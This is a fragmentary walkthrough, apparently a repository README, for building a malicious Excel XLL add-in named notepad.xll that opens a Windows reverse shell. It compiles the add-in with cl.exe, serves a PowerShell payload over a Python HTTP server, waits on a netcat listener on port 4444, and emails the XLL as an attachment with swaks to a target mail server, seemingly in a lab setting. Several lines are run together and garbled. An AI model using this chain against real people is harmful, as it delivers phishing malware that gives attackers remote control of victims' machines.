
xll windows reverse shell
xll windows reverse shell
git clone https://github.com/n3rdh4x0r/xll_windows_reverse_shell.git
revsh.ps1python3 -m http.server 9999
notpadXLL.c to your windows attacker machine and update the notpadXLL.c accordingly.x64 Native Tools Command Prompt for VS 2022notepad.xllcl.exe /LD notepadXLL.c /link /out:notepad.xll

notepad.xll to your Kali machineswaks curl -O https://jetmore.org/john/code/swaks/files/swaks-20240103.0/swaks
nc -nlvp 4444
swaks to send an email with notepad.xll attached:./swaks --to [email protected] --from [email protected] --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @notepad.xll
